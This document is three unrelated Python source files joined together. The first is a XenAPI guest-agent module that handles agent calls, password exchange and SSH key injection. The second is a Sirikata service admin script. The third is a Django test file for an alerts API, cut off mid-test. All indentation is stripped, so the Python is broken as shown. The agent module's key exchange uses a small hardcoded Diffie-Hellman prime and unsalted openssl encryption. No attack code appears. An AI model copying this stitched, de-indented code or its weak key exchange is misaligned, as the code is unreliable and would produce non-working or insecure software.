USE_AGENT_SM_KEY = utils.SM_IMAGE_PROP_PREFIX + USE_AGENT_KEY
SKIP_SSH_KEY = "xenapi_skip_agent_inject_ssh"
SKIP_SSH_SM_KEY = utils.SM_IMAGE_PROP_PREFIX + SKIP_SSH_KEY
SKIP_FILES_AT_BOOT_KEY = "xenapi_skip_agent_inject_files_at_boot"
SKIP_FILES_AT_BOOT_SM_KEY = utils.SM_IMAGE_PROP_PREFIX \
+ SKIP_FILES_AT_BOOT_KEY
LOG = logging.getLogger(__name__)
xenapi_agent_opts = [
cfg.IntOpt('agent_timeout',
default=30,
help='Number of seconds to wait for agent reply'),
cfg.IntOpt('agent_version_timeout',
default=300,
help='Number of seconds to wait for agent '
'to be fully operational'),
cfg.IntOpt('agent_resetnetwork_timeout',
default=60,
help='Number of seconds to wait for agent reply '
'to resetnetwork request'),
cfg.StrOpt('agent_path',
default='usr/sbin/xe-update-networking',
help='Specifies the path in which the XenAPI guest agent '
'should be located. If the agent is present, network '
'configuration is not injected into the image. '
'Used if compute_driver=xenapi.XenAPIDriver and '
'flat_injected=True'),
cfg.BoolOpt('disable_agent',
default=False,
help='Disables the use of the XenAPI agent in any image '
'regardless of what image properties are present.'),
cfg.BoolOpt('use_agent_default',
default=False,
help='Determines if the XenAPI agent should be used when '
'the image used does not contain a hint to declare if '
'the agent is present or not. '
'The hint is a glance property "' + USE_AGENT_KEY + '" '
'that has the value "True" or "False". '
'Note that waiting for the agent when it is not present '
'will significantly increase server boot times.'),
]
CONF = cfg.CONF
CONF.register_opts(xenapi_agent_opts, 'xenserver')
def _call_agent(session, instance, vm_ref, method, addl_args=None,
timeout=None, success_codes=None):
"""Abstracts out the interaction with the agent xenapi plugin."""
if addl_args is None:
addl_args = {}
if timeout is None:
timeout = CONF.xenserver.agent_timeout
if success_codes is None:
success_codes = ['0']
# always fetch domid because VM may have rebooted
dom_id = session.VM.get_domid(vm_ref)
args = {
'id': str(uuid.uuid4()),
'dom_id': str(dom_id),
'timeout': str(timeout),
}
args.update(addl_args)
try:
ret = session.call_plugin('agent', method, args)
except session.XenAPI.Failure as e:
err_msg = e.details[-1].splitlines()[-1]
if 'TIMEOUT:' in err_msg:
LOG.error(_('TIMEOUT: The call to %(method)s timed out. '
'args=%(args)r'),
{'method': method, 'args': args}, instance=instance)
raise exception.AgentTimeout(method=method)
elif 'REBOOT:' in err_msg:
LOG.debug('REBOOT: The call to %(method)s detected a reboot. '
'args=%(args)r',
{'method': method, 'args': args}, instance=instance)
_wait_for_new_dom_id(session, vm_ref, dom_id, method)
return _call_agent(session, instance, vm_ref, method,
addl_args, timeout, success_codes)
elif 'NOT IMPLEMENTED:' in err_msg:
LOG.error(_('NOT IMPLEMENTED: The call to %(method)s is not '
'supported by the agent. args=%(args)r'),
{'method': method, 'args': args}, instance=instance)
raise exception.AgentNotImplemented(method=method)
else:
LOG.error(_('The call to %(method)s returned an error: %(e)s. '
'args=%(args)r'),
{'method': method, 'args': args, 'e': e},
instance=instance)
raise exception.AgentError(method=method)
if not isinstance(ret, dict):
try:
ret = jsonutils.loads(ret)
except TypeError:
LOG.error(_('The agent call to %(method)s returned an invalid '
'response: %(ret)r. args=%(args)r'),
{'method': method, 'ret': ret, 'args': args},
instance=instance)
raise exception.AgentError(method=method)
if ret['returncode'] not in success_codes:
LOG.error(_('The agent call to %(method)s returned an '
'an error: %(ret)r. args=%(args)r'),
{'method': method, 'ret': ret, 'args': args},
instance=instance)
raise exception.AgentError(method=method)
LOG.debug('The agent call to %(method)s was successful: '
'%(ret)r. args=%(args)r',
{'method': method, 'ret': ret, 'args': args},
instance=instance)
# Some old versions of the Windows agent have a trailing \\r\\n
# (ie CRLF escaped) for some reason. Strip that off.
return ret['message'].replace('\\r\\n', '')
def _wait_for_new_dom_id(session, vm_ref, old_dom_id, method):
expiration = time.time() + CONF.xenserver.agent_timeout
while True:
dom_id = session.VM.get_domid(vm_ref)
if dom_id and dom_id != -1 and dom_id != old_dom_id:
LOG.debug("Found new dom_id %s" % dom_id)
return
if time.time() > expiration:
LOG.debug("Timed out waiting for new dom_id %s" % dom_id)
raise exception.AgentTimeout(method=method)
time.sleep(1)
def is_upgrade_required(current_version, available_version):
# NOTE(johngarbutt): agent version numbers are four part,
# so we need to use the loose version to compare them
current = version.LooseVersion(current_version)
available = version.LooseVersion(available_version)
return available > current
class XenAPIBasedAgent(object):
def __init__(self, session, virtapi, instance, vm_ref):
self.session = session
self.virtapi = virtapi
self.instance = instance
self.vm_ref = vm_ref
def _add_instance_fault(self, error, exc_info):
LOG.warning(_("Ignoring error while configuring instance with "
"agent: %s") % error,
instance=self.instance, exc_info=True)
try:
ctxt = context.get_admin_context()
compute_utils.add_instance_fault_from_exc(
ctxt, self.instance, error, exc_info=exc_info)
except Exception:
LOG.debug("Error setting instance fault.", exc_info=True)
def _call_agent(self, method, addl_args=None, timeout=None,
success_codes=None, ignore_errors=True):
try:
return _call_agent(self.session, self.instance, self.vm_ref,
method, addl_args, timeout, success_codes)
except exception.AgentError as error:
if ignore_errors:
self._add_instance_fault(error, sys.exc_info())
else:
raise
def get_version(self):
LOG.debug('Querying agent version', instance=self.instance)
# The agent can be slow to start for a variety of reasons. On Windows,
# it will generally perform a setup process on first boot that can
# take a couple of minutes and then reboot. On Linux, the system can
# also take a while to boot.
expiration = time.time() + CONF.xenserver.agent_version_timeout
while True:
try:
# NOTE(johngarbutt): we can't use the xapi plugin
# timeout, because the domid may change when
# the server is rebooted
return self._call_agent('version', ignore_errors=False)
except exception.AgentError as error:
if time.time() > expiration:
self._add_instance_fault(error, sys.exc_info())
return
def _get_expected_build(self):
ctxt = context.get_admin_context()
agent_build = objects.Agent.get_by_triple(
ctxt, 'xen', self.instance['os_type'],
self.instance['architecture'])
if agent_build:
LOG.debug('Latest agent build for %(hypervisor)s/%(os)s'
'/%(architecture)s is %(version)s', {
'hypervisor': agent_build.hypervisor,
'os': agent_build.os,
'architecture': agent_build.architecture,
'version': agent_build.version})
else:
LOG.debug('No agent build found for %(hypervisor)s/%(os)s'
'/%(architecture)s', {
'hypervisor': 'xen',
'os': self.instance['os_type'],
'architecture': self.instance['architecture']})
return agent_build
def update_if_needed(self, version):
agent_build = self._get_expected_build()
if version and agent_build and \
is_upgrade_required(version, agent_build['version']):
LOG.debug('Updating agent to %s', agent_build['version'],
instance=self.instance)
self._perform_update(agent_build)
else:
LOG.debug('Skipping agent update.', instance=self.instance)
def _perform_update(self, agent_build):
args = {'url': agent_build['url'], 'md5sum': agent_build['md5hash']}
try:
self._call_agent('agentupdate', args)
except exception.AgentError as exc:
# Silently fail for agent upgrades
LOG.warning(_("Unable to update the agent due "
"to: %(exc)s") % dict(exc=exc),
instance=self.instance)
def _exchange_key_with_agent(self):
dh = SimpleDH()
args = {'pub': str(dh.get_public())}
resp = self._call_agent('key_init', args, success_codes=['D0'],
ignore_errors=False)
agent_pub = int(resp)
dh.compute_shared(agent_pub)
return dh
def _save_instance_password_if_sshkey_present(self, new_pass):
sshkey = self.instance.get('key_data')
if sshkey and sshkey.startswith("ssh-rsa"):
ctxt = context.get_admin_context()
enc = crypto.ssh_encrypt_text(sshkey, new_pass)
self.instance.system_metadata.update(
password.convert_password(ctxt, base64.b64encode(enc)))
self.instance.save()
def set_admin_password(self, new_pass):
"""Set the root/admin password on the VM instance.
This is done via an agent running on the VM. Communication between nova
and the agent is done via writing xenstore records. Since communication
is done over the XenAPI RPC calls, we need to encrypt the password.
We're using a simple Diffie-Hellman class instead of a more advanced
library (such as M2Crypto) for compatibility with the agent code.
"""
LOG.debug('Setting admin password', instance=self.instance)
try:
dh = self._exchange_key_with_agent()
except exception.AgentError as error:
self._add_instance_fault(error, sys.exc_info())
return
# Some old versions of Linux and Windows agent expect trailing \n
# on password to work correctly.
enc_pass = dh.encrypt(new_pass + '\n')
args = {'enc_pass': enc_pass}
self._call_agent('password', args)
self._save_instance_password_if_sshkey_present(new_pass)
def inject_ssh_key(self):
sshkey = self.instance.get('key_data')
if not sshkey:
return
if self.instance['os_type'] == 'windows':
LOG.debug("Skipping setting of ssh key for Windows.",
instance=self.instance)
return
if self._skip_ssh_key_inject():
LOG.debug("Skipping agent ssh key injection for this image.",
instance=self.instance)
return
sshkey = str(sshkey)
keyfile = '/root/.ssh/authorized_keys'
key_data = ''.join([
'\n',
'# The following ssh key was injected by Nova',
'\n',
sshkey.strip(),
'\n',
])
return self.inject_file(keyfile, key_data)
def inject_files(self, injected_files):
if self._skip_inject_files_at_boot():
LOG.debug("Skipping agent file injection for this image.",
instance=self.instance)
else:
for path, contents in injected_files:
self.inject_file(path, contents)
def inject_file(self, path, contents):
LOG.debug('Injecting file path: %r', path, instance=self.instance)
# Files/paths must be base64-encoded for transmission to agent
b64_path = base64.b64encode(path)
b64_contents = base64.b64encode(contents)
args = {'b64_path': b64_path, 'b64_contents': b64_contents}
return self._call_agent('inject_file', args)
def resetnetwork(self):
LOG.debug('Resetting network', instance=self.instance)
# NOTE(johngarbutt) old FreeBSD and Gentoo agents return 500 on success
return self._call_agent('resetnetwork',
timeout=CONF.xenserver.agent_resetnetwork_timeout,
success_codes=['0', '500'])
def _skip_ssh_key_inject(self):
return self._get_sys_meta_key(SKIP_SSH_SM_KEY)
def _skip_inject_files_at_boot(self):
return self._get_sys_meta_key(SKIP_FILES_AT_BOOT_SM_KEY)
def _get_sys_meta_key(self, key):
sys_meta = utils.instance_sys_meta(self.instance)
raw_value = sys_meta.get(key, 'False')
return strutils.bool_from_string(raw_value, strict=False)
def find_guest_agent(base_dir):
"""tries to locate a guest agent at the path
specified by agent_rel_path
"""
if CONF.xenserver.disable_agent:
return False
agent_rel_path = CONF.xenserver.agent_path
agent_path = os.path.join(base_dir, agent_rel_path)
if os.path.isfile(agent_path):
# The presence of the guest agent
# file indicates that this instance can
# reconfigure the network from xenstore data,
# so manipulation of files in /etc is not
# required
LOG.info(_('XenServer tools installed in this '
'image are capable of network injection. '
'Networking files will not be'
'manipulated'))
return True
xe_daemon_filename = os.path.join(base_dir,
'usr', 'sbin', 'xe-daemon')
if os.path.isfile(xe_daemon_filename):
LOG.info(_('XenServer tools are present '
'in this image but are not capable '
'of network injection'))
else:
LOG.info(_('XenServer tools are not '
'installed in this image'))
return False
def should_use_agent(instance):
sys_meta = utils.instance_sys_meta(instance)
if USE_AGENT_SM_KEY not in sys_meta:
return CONF.xenserver.use_agent_default
else:
use_agent_raw = sys_meta[USE_AGENT_SM_KEY]
try:
return strutils.bool_from_string(use_agent_raw, strict=True)
except ValueError:
LOG.warn(_("Invalid 'agent_present' value. "
"Falling back to the default."),
instance=instance)
return CONF.xenserver.use_agent_default
class SimpleDH(object):
"""This class wraps all the functionality needed to implement
basic Diffie-Hellman-Merkle key exchange in Python. It features
intelligent defaults for the prime and base numbers needed for the
calculation, while allowing you to supply your own. It requires that
the openssl binary be installed on the system on which this is run,
as it uses that to handle the encryption and decryption. If openssl
is not available, a RuntimeError will be raised.
"""
def __init__(self):
self._prime = 162259276829213363391578010288127
self._base = 5
self._public = None
self._shared = None
self.generate_private()
def generate_private(self):
self._private = int(binascii.hexlify(os.urandom(10)), 16)
return self._private
def get_public(self):
self._public = pow(self._base, self._private, self._prime)
return self._public
def compute_shared(self, other):
self._shared = pow(other, self._private, self._prime)
return self._shared
def _run_ssl(self, text, decrypt=False):
cmd = ['openssl', 'aes-128-cbc', '-A', '-a', '-pass',
'pass:%s' % self._shared, '-nosalt']
if decrypt:
cmd.append('-d')
out, err = utils.execute(*cmd, process_input=text)
if err:
raise RuntimeError(_('OpenSSL error: %s') % err)
return out
def encrypt(self, text):
return self._run_ssl(text).strip('\n')
def decrypt(self, text):
return self._run_ssl(text, decrypt=True)
|
|
'''
A service is one component of a running Sirikata system, e.g. a single
space server, object host, pinto or cseg server. Each service must be
uniquely named and gets isolated storage where it is executed. Usually
a service will be based on a template.
'''
import util
import serviceconfig
import package
import monit
import os.path, subprocess, shutil
# Utilities
def services_path():
'''
Get path to the services data directory.
'''
return util.data_path('service')
def service_path(service, *args):
'''
Get path to a service data directory or file.
'''
return util.data_path('service', service, *args)
def service_load_config(service):
"""
Load the configuration for the given service
"""
return util.load_config(serviceconfig, 'service', service)
def service_validate_config(service):
"""
Validate basic configuration options exist and are valid for the
given service.
"""
if not service_load_config(service):
return 1
# Package
if not serviceconfig.package:
print "You must specify a package to provide binaries"
return 1
package.package_load_config(serviceconfig.package)
installdir = package.install_dir(serviceconfig.package)
bindir = os.path.join(installdir, 'bin')
if not os.path.exists(installdir) or not os.path.exists(bindir):
print "Couldn't find installed binaries in package", serviceconfig.package
return 1
# Binary
if not serviceconfig.binary:
print "You must specify a binary to execute."
return 1
binfile = os.path.join(bindir, serviceconfig.binary)
if not os.path.exists(binfile) or not os.path.isfile(binfile):
print "Couldn't find binary file", serviceconfig.binary, "in package", serviceconfig.package
return 1
# Args - nothing to check, they can be omitted
return True
# Commands
def command_service_init(*args):
'''
admin service init service_name package [template/path/]
Initialize service directory, optionally copying a template
service in to get it initialized. You must always specify a
package, which will be placed in the configuration so the service
uses binaries from that package.
'''
if len(args) < 2:
print "Must specify at least service name and package."
return 1
servname = args[0]
packname = args[1]
template = None
if len(args) > 2:
template = args[2]
if not os.path.exists(util.template_path(template)):
print "Couldn't find template", template
return 1
if os.path.exists(service_path(servname)):
print "Can't create service", servname, ": already exists"
return 1
return command_service_reinit(*args)
def command_service_reinit(*args):
'''
admin service reinit service_name package [template/path/]
Reinitialize a service directory, which does what init does but
will overwrite any existing files. This keeps data in place so
data can be preserved if the corresponding files haven't changed,
but the service is forced into a state to match the template
service.
'''
if len(args) < 2:
print "Must specify at least service name and package."
return 1
servname = args[0]
packname = args[1]
template = None
if len(args) > 2:
template = args[2]
if not os.path.exists(util.template_path(template)):
print "Couldn't find template", template
return 1
# Copy in template items. To support both init and reinit we:
# 1. Make sure we have the top level directory
serv_path = service_path(servname)
if not os.path.exists(serv_path): os.makedirs(serv_path)
# 2. Copy all the contents of the template in, excluding the config
template_dir = util.template_path(template)
for fi in os.listdir(template_dir):
if fi != 'config.py':
template_fi = os.path.join(template_dir, fi)
serv_fi = os.path.join(serv_path, fi)
if os.path.isdir(template_fi):
shutil.copytree(template_fi, serv_fi)
else:
shutil.copy(template_fi, serv_fi)
# Write or overwrite the config file. We need to insert the
# referenced package and optionally include the template config
serv_config_py = service_path(servname, 'config.py')
config_py_file = open(serv_config_py, 'w')
config_py_file.write("""
package = '%s'
""" % (packname))
if template:
template_config = util.template_path(template, 'config.py')
if os.path.exists(template_config):
with open(template_config) as f:
config_py_file.write(f.read())
config_py_file.close()
return 0
def command_service_ls(*args):
"""
admin service ls
List services found in this deployments data directory. A * is
appended if the configuration for the service validates.
"""
# Services, unlike templates and packages, can appear at different
# depths in the tree, so we need to do a full walk looking for
# configs.
services_dirs = [dirpath for (dirpath,dirnames,filenames) in os.walk(services_path()) if 'config.py' in filenames]
for servpath in services_dirs:
# We need to extract the service name, which could be a
# compound of multiple dirs. Grab everything after the path
# giving the base of the services directory (+ an extra /)
assert(servpath.startswith(services_path()))
servname = servpath[len(services_path())+1:]
# Filter to directories with config files.
if not os.path.isdir(service_path(servname)): continue
if not service_load_config(servname): continue
validates_flag = ''
if service_validate_config(servname) is True:
validates_flag = '*'
print servname, validates_flag
return 0
def get_run_params(servname):
class Params(object):
pass
# Load and validate config
service_validate_config(servname)
result = Params()
result.name = servname
result.work_dir = service_path(servname)
result.pidfile = service_path(servname, 'pid')
result.installdir = package.install_dir(serviceconfig.package)
result.bindir = os.path.join(result.installdir, 'bin')
result.binfile = os.path.join(result.bindir, serviceconfig.binary)
return result
def command_service_rawstart(*args):
'''
admin service rawstart service_name
Start a service running. This is the 'raw' version, which doesn't
deal with any wrappers like monit. It just starts the daemon
running. You generally shouldn't need to use this, it's just a
utility command.
'''
if len(args) == 0:
print 'No service name specified'
return 1
params = get_run_params(*args)
args = []
if serviceconfig.args:
args += ['--'] + serviceconfig.args
cmd = ['start-stop-daemon', '--start', '--quiet', '--background',
'--chdir', params.work_dir,
'--pidfile', params.pidfile, '--make-pidfile',
'--exec', params.binfile]
cmd += args
return subprocess.call(cmd, cwd=params.work_dir)
def command_service_rawstop(*args):
'''
admin service rawstop service_name
Stop a currently running service. This is a raw version which
doesn't handle any wrappers like monit. Generally it should only
be used internally.
'''
if len(args) == 0:
print 'No service name specified'
return 1
params = get_run_params(*args)
cmd = ['start-stop-daemon', '--stop', '--retry', '10', '--quiet', '--pidfile', params.pidfile]
return subprocess.call(cmd, cwd=params.work_dir)
def command_service_start(*args):
'''
admin service start service_name
Start a service running
'''
if len(args) == 0:
print 'No service name specified'
return 1
params = get_run_params(*args)
if serviceconfig.monit:
monit.start_service(args[0])
else:
command_service_rawstart(*args)
def command_service_stop(*args):
'''
admin service start service_name
Stop a currently running service.
'''
if len(args) == 0:
print 'No service name specified'
return 1
params = get_run_params(*args)
if serviceconfig.monit:
monit.stop_service(args[0])
else:
command_service_rawstop(*args)
def command_service_debug(*args):
'''
admin service debug service_name
Start a service running under gdb so you can debug it. This
doesn't add any of the wrappers provided by the normal service
start/stop commands
'''
if len(args) == 0:
print 'No service name specified'
return 1
params = get_run_params(*args)
cmd = [params.binfile, '--debug']
if serviceconfig.args:
cmd += serviceconfig.args
return subprocess.call(cmd, cwd=params.work_dir)
def command_service_destroy(*args):
"""
admin service destroy service_name
Destroy a service, i.e. remove all its contents from the filesystem.
"""
if len(args) == 0:
print 'No service name specified'
return 1
servname = args[0]
service_validate_config(servname)
servdir = service_path(servname)
if not os.path.exists(servdir):
return 1
# Try to stop before we destroy anything, just to be sure we clean
# up. Worst case, this just fails to do anything
command_service_stop(*args)
shutil.rmtree(servdir)
return 0
|
|
import datetime
import json
import urllib
from uuid import uuid4
from django.test.utils import override_settings
from . import AlertFlavorFactory, AlertFactory, LinkFactory
from fjord.alerts.models import Alert, Link
from fjord.api_auth.tests import TokenFactory
from fjord.base.tests import reverse, TestCase, WHATEVER
class AlertsGetAPIAuthTest(TestCase):
def test_missing_flavor(self):
qs = {
'flavors': 'fooflavor'
}
resp = self.client.get(
reverse('alerts-api') + '?' + urllib.urlencode(qs)
)
assert resp.status_code == 400
assert (
json.loads(resp.content) ==
{'detail': {'flavors': ['Flavor "fooflavor" does not exist.']}}
)
qs = {
'flavors': 'fooflavor,barflavor'
}
resp = self.client.get(
reverse('alerts-api') + '?' + urllib.urlencode(qs)
)
assert resp.status_code == 400
assert (
json.loads(resp.content) ==
{'detail': {'flavors': [
'Flavor "fooflavor" does not exist.',
'Flavor "barflavor" does not exist.'
]}}
)
flavor = AlertFlavorFactory(name='Foo', slug='fooflavor')
qs = {
'flavors': 'barflavor,' + flavor.slug
}
resp = self.client.get(
reverse('alerts-api') + '?' + urllib.urlencode(qs)
)
assert resp.status_code == 400
assert (
json.loads(resp.content) ==
{'detail': {'flavors': ['Flavor "barflavor" does not exist.']}}
)
def test_missing_auth_token(self):
flavor = AlertFlavorFactory(name='Foo', slug='fooflavor')
qs = {
'flavors': flavor.slug
}
resp = self.client.get(
reverse('alerts-api') + '?' + urllib.urlencode(qs)
)
assert resp.status_code == 401
assert (
json.loads(resp.content) ==
{'detail': 'Authentication credentials were not provided.'}
)
def test_missing_malformed_auth_token(self):
flavor = AlertFlavorFactory(name='Foo', slug='fooflavor')
qs = {
'flavors': flavor.slug
}
resp = self.client.get(
reverse('alerts-api') + '?' + urllib.urlencode(qs),
HTTP_AUTHORIZATION=''
)
assert resp.status_code == 401
assert (
json.loads(resp.content) ==
{'detail': 'Authentication credentials were not provided.'}
)
resp = self.client.get(
reverse('alerts-api') + '?' + urllib.urlencode(qs),
HTTP_AUTHORIZATION='token'
)
assert resp.status_code == 401
assert (
json.loads(resp.content) ==
{'detail': 'Invalid token header. No token provided.'}
)
resp = self.client.get(
reverse('alerts-api') + '?' + urllib.urlencode(qs),
HTTP_AUTHORIZATION='token token token'
)
assert resp.status_code == 401
assert (
json.loads(resp.content) ==
{'detail': ('Invalid token header. Token string should not '
'contain spaces.')}
)
def test_not_permitted(self):
token = TokenFactory()
flavor = AlertFlavorFactory(name='Foo', slug='fooflavor')
qs = {
'flavors': flavor.slug
}
resp = self.client.get(
reverse('alerts-api') + '?' + urllib.urlencode(qs),
HTTP_AUTHORIZATION='token ' + token.token
)
assert resp.status_code == 403
assert (
json.loads(resp.content) ==
{'detail': 'You do not have permission to perform this action.'}
)
def test_not_all_permitted(self):
token = TokenFactory()
flavor = AlertFlavorFactory(name='Foo', slug='fooflavor')
flavor2 = AlertFlavorFactory(name='Bar', slug='barflavor')
flavor.allowed_tokens.add(token)
qs = {
'flavors': flavor.slug + ',' + flavor2.slug
}
resp = self.client.get(
reverse('alerts-api') + '?' + urllib.urlencode(qs),
HTTP_AUTHORIZATION='token ' + token.token
)
assert resp.status_code == 403
assert (
json.loads(resp.content) ==
{'detail': 'You do not have permission to perform this action.'}
)
# Reverse the order of flavors to make sure that also works
qs = {
'flavors': flavor2.slug + ',' + flavor.slug
}
resp = self.client.get(
reverse('alerts-api') + '?' + urllib.urlencode(qs),
HTTP_AUTHORIZATION='token ' + token.token
)
assert resp.status_code == 403
assert (
json.loads(resp.content) ==
{'detail': 'You do not have permission to perform this action.'}
)
def test_disabled_flavor(self):
token = TokenFactory()
flavor = AlertFlavorFactory(
name='Foo', slug='fooflavor', enabled=False)
flavor.allowed_tokens.add(token)
qs = {
'flavors': flavor.slug
}
resp = self.client.get(
reverse('alerts-api') + '?' + urllib.urlencode(qs),
HTTP_AUTHORIZATION='token ' + token.token
)
assert resp.status_code == 400
assert (
json.loads(resp.content) ==
{'detail': {'flavors': ['Flavor "fooflavor" is disabled.']}}
)
def test_fjord_authorization_token(self):
"""Verify auth will use Fjord-Authorization header if Authorization
isn't there
"""
token = TokenFactory()
flavor = AlertFlavorFactory(name='Foo', slug='fooflavor')
flavor.allowed_tokens.add(token)
qs = {
'flavors': flavor.slug
}
resp = self.client.get(
reverse('alerts-api') + '?' + urllib.urlencode(qs),
HTTP_FJORD_AUTHORIZATION='token ' + token.token
)
assert resp.status_code == 200
assert (
json.loads(resp.content) ==
{u'count': 0, u'total': 0, u'alerts': []}
)
class AlertsGetAPITest(TestCase):
def test_bad_args(self):
token = TokenFactory()
flavor = AlertFlavorFactory(name='Foo', slug='fooflavor')
flavor.allowed_tokens.add(token)
AlertFactory(summary=u'alert 1', flavor=flavor)
qs = {
'flavors': flavor.slug,
'foo': 'bar'
}
resp = self.client.get(
reverse('alerts-api') + '?' + urllib.urlencode(qs),
HTTP_AUTHORIZATION='token ' + token.token
)
assert resp.status_code == 400
assert (
json.loads(resp.content) ==
{
'detail': {
'non_field_errors': ['"foo" is not a valid argument.']
}
}
)
def test_get_one_flavor(self):
token = TokenFactory()
flavor = AlertFlavorFactory(name='Foo', slug='fooflavor')
flavor.allowed_tokens.add(token)
AlertFactory(summary=u'alert 1', flavor=flavor)
AlertFactory(summary=u'alert 2', flavor=flavor)
AlertFactory(summary=u'alert 3', flavor=flavor)
qs = {
'flavors': flavor.slug
}
resp = self.client.get(
reverse('alerts-api') + '?' + urllib.urlencode(qs),
HTTP_AUTHORIZATION='token ' + token.token
)
assert resp.status_code == 200
assert (
json.loads(resp.content) ==
{
u'count': 3,
u'total': 3,
u'alerts': [
{
u'id': WHATEVER,
u'summary': u'alert 1',
u'description': u'the account balance is at $5.',
u'flavor': flavor.slug,
u'emitter_version': 0,
u'emitter_name': u'balance-checker',
u'start_time': None,
u'end_time': None,
u'created': WHATEVER,
u'severity': 0,
u'links': []
}, {
u'id': WHATEVER,
u'summary': u'alert 2',
u'description': u'the account balance is at $5.',
u'flavor': flavor.slug,
u'emitter_version': 0,
u'emitter_name': u'balance-checker',
u'start_time': None,
u'end_time': None,
u'created': WHATEVER,
u'severity': 0,
u'links': []
}, {
u'id': WHATEVER,
u'summary': u'alert 3',
u'description': u'the account balance is at $5.',
u'flavor': flavor.slug,
u'emitter_version': 0,
u'emitter_name': u'balance-checker',
u'start_time': None,
u'end_time': None,
u'created': WHATEVER,
u'severity': 0,
u'links': []
}
]
}
)
def test_get_multiple_flavors(self):
token = TokenFactory()
flavor = AlertFlavorFactory(name='Foo', slug='fooflavor')
flavor.allowed_tokens.add(token)
flavor2 = AlertFlavorFactory(name='Bar', slug='barflavor')
flavor2.allowed_tokens.add(token)
AlertFactory(summary=u'alert 1', flavor=flavor)
AlertFactory(summary=u'alert 2', flavor=flavor2)
qs = {
'flavors': flavor.slug + ',' + flavor2.slug
}
resp = self.client.get(
reverse('alerts-api') + '?' + urllib.urlencode(qs),
HTTP_AUTHORIZATION='token ' + token.token
)
assert resp.status_code == 200
assert (
json.loads(resp.content) ==
{
u'count': 2,
u'total': 2,
u'alerts': [
{
u'id': WHATEVER,
u'summary': u'alert 1',
u'description': u'the account balance is at $5.',
u'flavor': flavor.slug,
u'emitter_version': 0,
u'emitter_name': u'balance-checker',
u'start_time': None,
u'end_time': None,
u'created': WHATEVER,
u'severity': 0,
u'links': []
}, {
u'id': WHATEVER,
u'summary': u'alert 2',
u'description': u'the account balance is at $5.',
u'flavor': flavor2.slug,
u'emitter_version': 0,
u'emitter_name': u'balance-checker',
u'start_time': None,
u'end_time': None,
u'created': WHATEVER,
u'severity': 0,
u'links': []
}
]
}
)
def test_max(self):
token = TokenFactory()
flavor = AlertFlavorFactory(name='Foo', slug='fooflavor')
flavor.allowed_tokens.add(token)
alert1 = AlertFactory(summary=u'alert 1', flavor=flavor)
# We backdate the created so we can verify we're getting the
# right order of alerts.
alert1.created = datetime.datetime.now() - datetime.timedelta(days=5)
alert1.save()
AlertFactory(summary=u'alert 2', flavor=flavor)
qs = {
'flavors': flavor.slug,
'max': 1
}
resp = self.client.get(
reverse('alerts-api') + '?' + urllib.urlencode(qs),
HTTP_AUTHORIZATION='token ' + token.token
)
assert resp.status_code == 200
assert (
json.loads(resp.content) ==
{
u'count': 1,
u'total': 2,
u'alerts': [
{
u'id': WHATEVER,
u'summary': u'alert 2',
u'description': u'the account balance is at $5.',
u'flavor': flavor.slug,
u'emitter_version': 0,
u'emitter_name': u'balance-checker',
u'start_time': None,
u'end_time': None,
u'created': WHATEVER,
u'severity': 0,
u'links': []
}
]
}
)
def test_bad_max(self):
token = TokenFactory()
flavor = AlertFlavorFactory(name='Foo', slug='fooflavor')
flavor.allowed_tokens.add(token)
qs = {
'flavors': flavor.slug,
'max': 'one'
}
resp = self.client.get(
reverse('alerts-api') + '?' + urllib.urlencode(qs),
HTTP_AUTHORIZATION='token ' + token.token
)
assert resp.status_code == 400
assert (
json.loads(resp.content) ==
{'detail': {'max': ['A valid integer is required.']}}
)
qs = {
'flavors': flavor.slug,
'max': 0
}
resp = self.client.get(
reverse('alerts-api') + '?' + urllib.urlencode(qs),
HTTP_AUTHORIZATION='token ' + token.token
)
assert resp.status_code == 400
assert (
json.loads(resp.content) ==
{
'detail': {
'max': [
'Ensure this value is greater than or equal to 1.'
]
}
}
)
def test_start_time(self):
token = TokenFactory()
flavor = AlertFlavorFactory(name='Foo', slug='fooflavor')
flavor.allowed_tokens.add(token)
today = datetime.datetime.now()
yesterday = today - datetime.timedelta(days=1)
daybeforeyesterday = yesterday - datetime.timedelta(days=1)
alert1 = AlertFactory(
summary=u'alert 1',
flavor=flavor,
start_time=yesterday
)
alert2 = AlertFactory(
summary=u'alert 2',
flavor=flavor,
start_time=daybeforeyesterday
)
def test_scenario(start_time_start, start_time_end, expected):
qs = {
'flavors': flavor.slug,
}
if start_time_start:
qs['start_time_start'] = start_time_start
if start_time_end:
qs['start_time_end'] = start_time_end
resp = self.client.get(
reverse('alerts-api') + '?' + urllib.urlencode(qs),
HTTP_AUTHORIZATION='token ' + token.token
)
assert resp.status_code == 200
data = json.loads(resp.content)
assert (
sorted([alert['summary'] for alert in data['alerts']]) ==
sorted(expected)
)
# Start yesterday at 00:00
test_scenario(
start_time_start=yesterday.strftime('%Y-%m-%dT00:00'),
start_time_end=None,
expected=[alert1.summary]
)
# Start today at 00:00
test_scenario(
start_time_start=today.strftime('%Y-%m-%dT00:00'),
start_time_end=None,
expected=[]
)
# End today at 23:59
test_scenario(
start_time_start=None,
start_time_end=today.strftime('%Y-%m-%dT23:59'),
expected=[alert1.summary, alert2.summary]
)
# End day before yesterday at 00:00
test_scenario(
start_time_start=None,
start_time_end=daybeforeyesterday.strftime('%Y-%m-%dT23:59'),
expected=[alert2.summary]
)
# Start daybeforeyesterday at 00:00 and end today at 23:59
test_scenario(
start_time_start=daybeforeyesterday.strftime('%Y-%m-%dT00:00'),
start_time_end=today.strftime('%Y-%m-%dT23:59'),
expected=[alert1.summary, alert2.summary]
)
def test_start_time_invalid(self):
token = TokenFactory()
flavor = AlertFlavorFactory(name='Foo', slug='fooflavor')
flavor.allowed_tokens.add(token)
qs = {
'flavors': flavor.slug,
'start_time_start': 'one',
'start_time_end': 'one'
}
resp = self.client.get(
reverse('alerts-api') + '?' + urllib.urlencode(qs),
HTTP_AUTHORIZATION='token ' + token.token
)
assert resp.status_code == 400
data = json.loads(resp.content)
assert (
data['detail']['start_time_start'][0]
.startswith('Datetime has wrong format')
)
assert (
data['detail']['start_time_end'][0]
.startswith('Datetime has wrong format')
)
qs = {
'flavors': flavor.slug,
'start_time_start': datetime.datetime.now(),
'start_time_end': (
datetime.datetime.now() - datetime.timedelta(days=1)
)
}
resp = self.client.get(
reverse('alerts-api') + '?' + urllib.urlencode(qs),
HTTP_AUTHORIZATION='token ' + token.token
)
assert resp.status_code == 400
data = json.loads(resp.content)
assert (
data['detail'] ==
{'non_field_errors': [
u'start_time_start must occur before start_time_end.'
]}
)
def test_end_time(self):
token = TokenFactory()
